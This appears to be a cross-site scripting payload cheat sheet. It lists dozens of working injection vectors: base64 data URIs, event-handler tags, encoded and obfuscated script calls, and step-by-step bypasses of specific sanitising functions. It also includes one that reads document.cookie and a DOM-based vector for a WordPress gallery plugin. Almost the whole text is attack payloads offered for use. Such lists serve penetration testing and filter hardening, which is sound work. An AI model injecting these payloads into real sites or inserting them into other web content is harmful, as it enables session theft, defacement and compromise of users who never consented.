


data:text/html;base64,PHNjcmlwdD5jb25maXJtKGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD4= //confirm(document.domain)
data:text/html;base64,PHNjcmlwdD5jb25maXJtKGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4= //confirm(document.cookie)
data:text/html;base64,PHNjcmlwdD5hbGVydCgiYnkgc3RydWt0Iik8L3NjcmlwdD4=  //alert("by strukt")

"><svg onload=confirm(domain)>


"><script>confirm(document.domain)</script>


"><img src=x onerror=confirm(domain)>


1"--></script><svg/onload=';confirm(domain);'>


--></script>">'><script>alert(1)</script>

';alert(1)//';alert(1)//";alert(1)//";alert(1)//--></SCRIPT>">'><SCRIPT>alert(1)</SCRIPT>

<svg </onload ="1> (_=alert,_(1337)) ""> 

<svg><x><script>alert&#40;7&#41</x>

<svg><x><script>alert&#40;1&#41</x>
<svg><x><script>alert&#40;&#39;1&#39;&#41</x>
<svg onload=window.onerror=alert;throw/1/;//"/>
<img src=x onerror=while(true){prompt(1)}>
<iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'>
<!--<img src="--><img src=x onerror=alert(1)//">
<svg id=javascript:alert(1) onload=location=id>
<svg id=alert(1) onload=eval(id)>
<img src=x:alert(alt) onerror=eval(src) alt=xwx>
<body/onpageshow=(alert)(1)>
<svg id=alert(1) onload=eval(id)>
<svg onload=(alert)(1) >
<frameset onload=alert(1)> 
<ahref=javascript&colon;confirm(1);>click</a>
<iframe/src="data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload=confirm(1);>">
<marquee loop=1 width=0 onfinish=alert(1)> // FF and IE only
                                                       
/*To bypass input values*/

"autofocus/onfocus="alert &#40/1&#41
onfocus=onfocus=\u0061lert(1) autofocus
autofocus onfocus=window.onerror=alert;throw/1/;//
<svg/onload=window.onerror=alert;throw/1/;>
<script> $=1, alert($) </script>
<script> (alert) (1) </script>
<script> eval(String.raw({[`raw`]:`aet(1)`},...`lr`)) </script>
<xss onanimationend=alert(1337)><style>*{animation-name:n}@keyframes n{} //Not FF
                                                       
 
/*Bypass filtration "script/alert"*/
					   
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>	
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
                                                      
/*tougher policy on the html tags*/ 
					 
<h1 onmouseover=alert&lpar;1&rpar;>xwx
<h1/onmouseover='\u0061lert(1)'>xwx
<marquee/onstart=alert(1)>xwx
<div/onmouseover='alert(1)'>xwx
<h1/onmouseover='alert(1)'>xwx
<h1 onmouseover='alert(1)'>xwx
<p onmouseover='alert(1)'>xwx
<p/onmouseover='alert(1)'>xwx
<plaintext/onmouseover=prompt(1)>          
		                                               
/*Classic very popular vectors*/
					 
<script>alert(1)</script>
</script><img src=x onerror=alert(1);>
</script><iframe/onload=alert(1)>
<img src=x onerror=alert(1);>
<style ONLOAD=prompt(1)>
<iframe/onload=alert(1)>
<svg/onload=prompt(1)>
<svg onload=alert(1)>
<select * from autofocus where onfocus="alert(1)";

style=display:block;width:100%;height:100%;position:absolute;top:0;left:0;background-color:blue;z-index:99999999 onmousemove=alert(document.domain)

"style=background:black; onmouseover=alert(1)"
"autofocus/onfocus="alert(1)
"onmouseover="alert(1);"
"/onmouseover= alert(1)>
"onload="alert(1)""
strukt" accesskey="X" onclick="alert(document.domain) //ALT+SHIFT+X to trigger, works for hidden fields
                                                        
															
/*HTML5 popular vectors*/
					 
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video onerror="javascript:alert(1)"><source>
<audio onerror="javascript:alert(1)"><source>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form><button formaction="javascript:alert(1)">		 
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)"> // Firefox only
<details ontoggle=alert(1)> //Chrome only
<input type="search" onsearch="prompt(1)"  autofocus> //Chrome only
					 
					 


/*data:text*/

data:text/plain,alert('xwx')
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==




/*Bonus Dom Based Xss vector for popular WordPress plugin Prettyphoto*/
					 
#!prettyPhoto/2,<a onclick="alert(1);">/		                /*firefox*/			 
#prettyPhoto[gallery]/1,<a onclick="alert(1);">/                  /*firefox*/
#prettyPhoto[rmsg0d]/2,<img src=x onerror=alert(1)>/	/*firefox*/	
#prettyphoto[pp_gal]/2,<img src=1 onerror=alert(1)>	       /*Only Google chrome*/
#prettyPhoto[i]/x,<svg/onload=alert(0)>/x                        /*firefox*/	
#prettyphoto[xss]/x,<img src=x onerror=prompt(0)>/x      /*firefox*/	







/*Bypass addslashes()*/

"' onmouseover=alert(1) a= '"








/*Bypass filters using US-Encoding (IE 6 & 7 only)*/

¼script¾alert(¢xss¢)¼/script¾






/*
For script contexts like

<script> var x = "INJECTION_HERE"; </script>

OR

<script> var x = 'INJECTION_HERE'; </script>
*/

Try ";confirm(1);" or "; confirm(1); //,

 if not then try ';confirm(1); //,

 if not then try </script><script>alert(1)</script>.

If all fail, then it's not vulnerable.






/*
For attribute contexts like

<div class="INJECTION_POINT"> stuff here </div>

OR

<div class='INJECTION_POINT'> stuff here </div>
*/

Try " onmouseover="alert(1),

if not then try 'onmouseover='alert(1),

if not then try `` onmouseover=alert(1) (Works in IE8), 

if not then it's not vulnerable.








/*
For style contexts like

<div style="INJECTION_POINT"> stuff here </div>

OR

<div style='INJECTION_POINT'> stuff here </div>

(WORKS FOR IE ONLY)
*/

Try widt:expression(alert(1)),

if not try width:exp/**/ression(alert(1)),

if not try width&#x3A;expre/**/ssion&#x28;alert&#x28;1&#x29&#x29,

if not try width:expression\28 alert \28 1 \29 \29,

if not then it's not vulnerable.




/*HTML context bypasses of removexss()*/

<input type=text oninput=alert(1)>

<form action=ja&Tab;vasc&NewLine;ript&colon;alert&lpar;1&rpar;><button type=submit>






/*Attribute context bypasses of removexss()*/

Use onpopstate, onstorage, onshow, or any eventhandlers that aren't blacklisted.

<div ontouchstart=alert(1)>hello</div> /* Mobile only*/

<body onpopstate=alert(1)></body>

<video onprogress=alert(1)><source src=http://www.w3schools.com/tags/mov_bbb.ogg type=video/ogg></video>






/*Style context bypass of removexss()*/

width:exp/**/ression(alert(1))







/*URL context bypass of removexss()*/

ja&Tab;vasc&NewLine:ript&colon;alert&lpar;1&rpar;








/*Script context bypass of removexss()*/

&#x27;; confirm(1); &#x27;


&#39;; confirm(1); &#39;





/*HTML context bypasses of cleaninput()*/


<img src=x id=confirm(1) onerror=eval(id)

<iframe/src=javascript:confirm%281%29



/*Style context bypass for cleaninput()*/

width:expression&#x28;alert&#x28;1&#x29;&#x29;




/*HTML context bypass of detectxss()*/

<form/action=ja&Tab;vascr&Tab;ipt&colon;confirm(1)>
<button/type=submit>

<math><a/xlink:href=javascript&colon;confirm&lpar;1&rpar;>click


